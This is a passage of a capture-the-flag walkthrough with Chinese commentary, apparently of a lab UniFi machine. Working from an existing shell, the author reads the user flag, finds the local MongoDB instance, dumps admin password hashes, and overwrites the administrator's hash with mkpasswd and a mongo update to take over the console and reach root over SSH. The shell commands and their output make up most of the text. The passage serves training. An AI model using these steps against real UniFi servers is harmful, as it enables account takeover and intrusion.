37973 drwxr-xr-x 4 unifi unifi 4.0K Jun  6 08:23 ..
37705 -rw-r--r-- 1 unifi unifi 7.7K Dec 31  2021 6.4.54.unf
43518 drwxr-xr-x 2 unifi unifi 4.0K Jan  2  2022 autobackup
37892 -rw-r--r-- 1 unifi unifi  123 Dec 31  2021 meta.json
unifi@unified:/usr/lib/unifi/data/backup$ cat meta.json
cat meta.json
{"6.4.54":{"version":"6.4.54","time":1640911998680,"datetime":"2021-12-31T00:53:18Z","format":"bson","days":0,"size":7824}}unifi@unified:/usr/lib/unifi/data/backup$ cd autobackup
cd autobackup
unifi@unified:/usr/lib/unifi/data/backup/autobackup$ ls
ls
unifi@unified:/usr/lib/unifi/data/backup/autobackup$ cd /
cd /
unifi@unified:/$ ls
ls
bin   dev  home  lib64  mnt  proc  run   srv  tmp    usr
boot  etc  lib   media  opt  root  sbin  sys  unifi  var
unifi@unified:/$ cd /home
cd /home
unifi@unified:/home$ ls
ls
michael
unifi@unified:/home$ cd michael
cd michael
unifi@unified:/home/michael$ ls
ls
user.txt
unifi@unified:/home/michael$ cat user.txt
cat user.txt
6ced1a6a89e666c0620cdb10262ba127

ps 命令查看进程信息

unifi@unified:/home/michael$ ps aux
ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
unifi          1  0.0  0.0   1080     4 ?        Ss   08:23   0:00 /sbin/docker-
unifi          6  0.0  0.1  18512  3140 ?        S    08:23   0:00 bash /usr/loc
unifi         16  1.5 25.4 3670972 518176 ?      Sl   08:23   0:46 java -Dunifi.
unifi         66  0.4  4.1 1099648 85388 ?       Sl   08:23   0:13 bin/mongod --
unifi       1366  0.0  0.1  18380  2992 ?        S    09:09   0:00 bash -c {echo
unifi       1370  0.0  0.1  18512  3180 ?        S    09:09   0:00 bash -i
unifi       1373  0.0  0.1  18380  3088 ?        S    09:09   0:00 bash
unifi       1389  0.0  0.1  19312  2180 ?        S    09:10   0:00 script /dev/n
unifi       1390  0.0  0.0   4632   884 pts/0    Ss   09:10   0:00 sh -c bash
unifi       1391  0.0  0.1  18512  3416 pts/0    S    09:10   0:00 bash
unifi       1460  0.0  0.1  34408  2760 pts/0    R+   09:12   0:00 ps aux
unifi@unified:/home/michael$ netstat -nat
netstat -nat
bash: netstat: command not found
unifi@unified:/home/michael$ netstat
netstat
bash: netstat: command not found
unifi@unified:/home/michael$ ps aux | grep mongo
ps aux | grep mongo
unifi         66  0.4  4.1 1099648 85388 ?       Sl   08:23   0:14 bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1
unifi       1503  0.0  0.0  11468  1040 pts/0    S+   09:13   0:00 grep mongo

这里有个小技巧，ps aux 的结果中没有端口信息，而使用 grep 进行过滤后，可以得到某个进程更具体的信息。我们得到了 mongo 的端口号，使用命令行来和 MongoDB 服务进行交互，使用谷歌搜索确定 UniFi 默认数据的名称为 ace，使用以下命令来获得用户和其shadow

mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

mongo 命令行修改数据库

这里的哈希值没法爆破出来，但是换个思路，我们可以直接修改 shadow

┌──(i3eg1nner㉿minilite)-[~]
└─$ mkpasswd -m sha-512 Password1234
$6$iUKnCe31IP2yVcQw$h01M94RtVE/dHAnBOMNr.DzK.XlT3gQtjo1xHd2j.g3ZKoS7ryrhi.F27uRON.DTkX/IwnF.dGAfUj5yGYnyd1

使用 mkpasswd 来获得 sha512 类型的哈希值

unifi@unified:/usr/lib/unifi$ mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$iUKnCe31IP2yVcQw$h01M94RtVE/dHAnBOMNr.DzK.XlT3gQtjo1xHd2j.g3ZKoS7ryrhi.F27uRON.DTkX/IwnF.dGAfUj5yGYnyd1"}})'
<.g3ZKoS7ryrhi.F27uRON.DTkX/IwnF.dGAfUj5yGYnyd1"}})'
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27117/ace
MongoDB server version: 3.6.3
WriteResult({ "nMatched" : 1, "nUpserted" : 0, "nModified" : 1 })

在使用上一个命令查看修改是否成功，确定修改成功后，登录 UniFi

在 settings 的 site 中，可以开启 ssh 登录授权，直接拿到了用户名和密码

最后 ssh 登录即可拿到 root.txt